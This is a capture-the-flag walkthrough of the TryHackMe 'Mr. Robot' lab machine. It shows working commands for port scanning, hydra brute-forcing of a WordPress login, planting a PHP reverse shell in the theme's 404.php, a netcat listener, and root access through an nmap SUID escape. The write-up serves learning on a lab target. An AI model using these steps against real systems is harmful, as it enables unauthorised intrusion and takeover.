Mr. Robot - TryHackMe Walkthrough
“Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them? Credit to Leon Johnson for creating this machine.”
This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
URL: Mr. Robot
Difficulty: Medium
Author: Ben
Enumeration
We are given the IP 10.10.235.143. Run an nmap scan with the following command:
nmap -p- -A -o portscan 10.10.235.143
PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03
Very common ports when doing CTF - we have ssh, and HTTP (running HTTPS).
Let’s start enumerating by exploring port 80 on my browser:
The fancy web terminal gives a few options which are all references to the TV show Mr. Robot.
Let’s do a dirb scan to find more paths in the web directory:
dirb http://10.10.235.143/
I stopped the scan early because it was taking a long time. I visited /login and it gave me a Wordpress login page.
The website is evidently running Wordpress which we know is prone to a lot of attacks.
Let’s run a Wordpress scan with WPScan. Please note, the newer version requires an API key you can get for free on their website.
Here are some of the important results from the scan:
The website is running WordPress version 4.3.1.
Unfortunately, no users have been found:
It is using the theme “twentyfifteen”:
There were 81 vulnerabilities found with the Wordpress version:
There is a robots.txt file:
This was also found in the dirb scan, let’s check it out:
User-agent: * fsocity.dic key-1-of-3.txt
Let’s check these paths out:
fsocity.dic:
I downloaded this file onto my local machine.
head fsocity.dic wc -l fsocity.dic
This file contains 858160 lines of text, it looks like a wordlist for something. This may come into use later.
key-1-of-3.txt:
This is the first key for the challenge.
There wasn’t much else to find. Wordpress boxes usually entail brute-forcing but I have no usernames. We were given that dictionary from earlier so maybe the username is in there.
This is what happens when the wrong username is entered on Wordpress:
The failed message indicates the username is unknown, so we can use a tool like hydra to spot a different failure message to find the correct username.
ERROR: Invalid username. Lost your password?
The dictionary from earlier seems to have a lot of duplicates so let’s filter these out. We’ll use sort to do this.
sort fsocity.dic | uniq > new.dic wc -l new.dic
The file was reduced to 11451 lines.
Let’s set up in order to brute-force the login.
You can find more information about this type of attack on these articles:
1 - Get the HTTP request:
2 - Open up Burp Suite, the intercept should be on.
3 - Enter a random username and password on the website login page, Burp Suite should capture the request. Send this to the intruder and clear variables (right-click > sent to int > clear §)
4 - Take note of this request. You can turn off the proxy and intercept now.
Now we can use hydra to test out a bunch of usernames against the login. This is the hydra command:
hydra -vV -L new.dic -p somepassword 10.10.235.143 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
Here is a breakdown of the command above:
-vV verbose, -L dictionary, -p irrelevant password, host, brute with post form, ‘login page : POST parameters to send USER PASS are the variables : F= failed message’
Execute this command. After a few minutes I get the following result:
We have identified “elliot” as a username.
Now let’s attempt a password with this username but a different failed attempt message. This is the web page response when I enter the correct username and an incorrect password.
We have the following failed attempt message:
ERROR: The password you entered for the username Elliot is incorrect
Now let’s do the same method of bruting for the password. This is the new hydra command:
hydra -vV -P new.dic -l elliot 192.168.56.119 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=The password'
Notice how we are now using our username with -l elliot, and the dictionary for our password now with -P new.dic. We have also changed the failed message, I just shortened it to “The password”.
Running this command gives the following result:
login: elliot password: E*******2
Great. We have some credentials, so we now have authenticated access. We can now exploit this, aiming for some kind of reverse shell.
A pretty straight forward method of getting a reverse shell with Wordpress is by uploading a php reverse shell file. I learnt this with another Wordpress machine I recently completed.
You can read more about reverse shells here:
If you’re working from a Kali Linux machine, there are some pre-made web shells in the following directory:
/usr/share/webshells
Use the following command to copy a php reverse shell to your current directory:
cp /usr/share/webshells/php/php-reverse-shell.php .
Edit the file and add your local TryHackMe IP and port 4444.
nano php-reverse-shell.php
I tried uploading the php file to the website however Wordpress blocks any attempt to upload php files. Another method is to upload the code to an already existing php file.
Go to the editor section on Wordpress and edit the 404.php code.
Now the payload is ready, set up a netcat listener to listen on your specified port.
netcat -nvlp 4444
Now that everything is set up, visit the modified 404.php page.
http://10.10.235.143/404.php
We got the reverse shell, signed in as “daemon”.
I went to visit the /home directory to see who is on the system. There is a user called robot with a couple of files. I was unable to see the contents of the key file but I was able to see what was inside “password.raw-md5”.
cd /home/robot ls cat key-2-of-3.txt cat password.raw-md5
robot:c3****************************3b
This looks like a hash value, a quick google search reveals the password:
Let’s try and change the user to robot with this password that we found in his home directory. Make sure the shell is upgraded to fully interactive TTY, otherwise the command will not work.
python -c 'import pty; pty.spawn("/bin/bash")'
su robot
We have successfully logged in a Robot, and we can also view the second key in Robot’s home directory:
key-2-of-3.txt
Privilege Escalation
Now that we have a lower privileged user, we are aiming to escalate this for sudo rights in order to have complete ownership of the system.
Let’s firstly check for SUID. SUID is essentially a way to run a command as another user using any services running on the unix-like operating system. We can use these to elevate our current rights on the system.
This following command checks for all the SUID binaries on the system:
find / -user root -perm -4000 -print 2>/dev/null
If you are interested in another machine where SUID exploitation is needed, look at my other writeup on ByteSec - a Vulnhub machine.
When analysing these binaries, it’s good to have a list of native binaries. Here is a list:
ping ping6 passwd sudo chfn apring gpasswd chsh chfn mount sudo su umount mount newgrp pppd
We can identify NMAP as a non-native SUID. We need to investigate this further. I researched how to exploit NMAP SUID binary. This is the website I used:
Firstly, let’s get an interactive NMAP shell with the following command:
nmap --interactive
And now we can run the next command for elevated privileges:
!sh
And we have root! Nice and simple SUID exploitation for elevating rights. The last flag will be in /root:
